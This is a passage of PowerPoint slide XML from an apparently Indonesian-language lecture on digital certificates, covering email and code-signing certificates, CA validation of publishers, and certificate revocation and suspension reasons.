              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> email, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> email RFC 822. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>penerbit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> SAN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>nakal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1"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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26335812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Pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditutup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meninggalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, nama domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seterusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alasan-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikodifikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kompromi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Digantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penghentian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Certificate Hold.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Harus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditangguhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CA </a:t>
